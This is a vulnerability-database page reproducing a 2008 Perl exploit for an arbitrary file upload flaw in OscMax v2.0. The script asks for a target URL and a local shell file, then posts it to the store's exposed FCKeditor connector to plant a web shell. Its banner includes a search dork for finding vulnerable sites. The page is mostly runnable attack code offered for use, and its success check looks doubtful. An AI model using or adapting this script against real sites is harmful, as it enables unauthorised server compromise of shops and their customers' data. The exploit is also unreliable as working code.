Lucene search
K

oscmax-upload.txt

🗓️ 24 Sep 2008 00:00:00Reported by e.wiZz!Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

OscMax v2.0 Arbitrary File Upload Vulnerability in Perl script

Code
`#!/usr/bin/perl  
use strict;  
use warnings;  
use LWP::UserAgent;  
use HTTP::Request::Common;  
print <<START;  
in the wild...  
########################################################  
#OscMax v2.0 Arbitrary File Upload Vulnerability #  
# #  
#By: e.wiZz! #  
#Site: infected.blogger.ba #  
#Info: Bosnian Idiot FTW! #  
#Greetz: suN8Hclf,str0ke,najjaci.net #  
#Dork: "powered by oscmax v2.0" 69 800 :) # #  
########################################################  
########################################################  
START  
print "Enter URL(http://inthewild.xxx): ";  
chomp(my $url=<STDIN>);  
  
print "Localpath of shell(C:/whatever): ";  
chomp(my $file=<STDIN>);  
my $ua = LWP::UserAgent->new;  
my $re = $ua->request(POST $url.'FCKeditor/editor/filemanager/browser/default/connectors/test.html',  
Content_Type => 'form-data',  
Content => [ NewFile => $file ] );  
if($re->is_success) {  
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }  
else { print "Failed!\n"; }  
} else { print "No site tho!\n"; }  
exit;`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation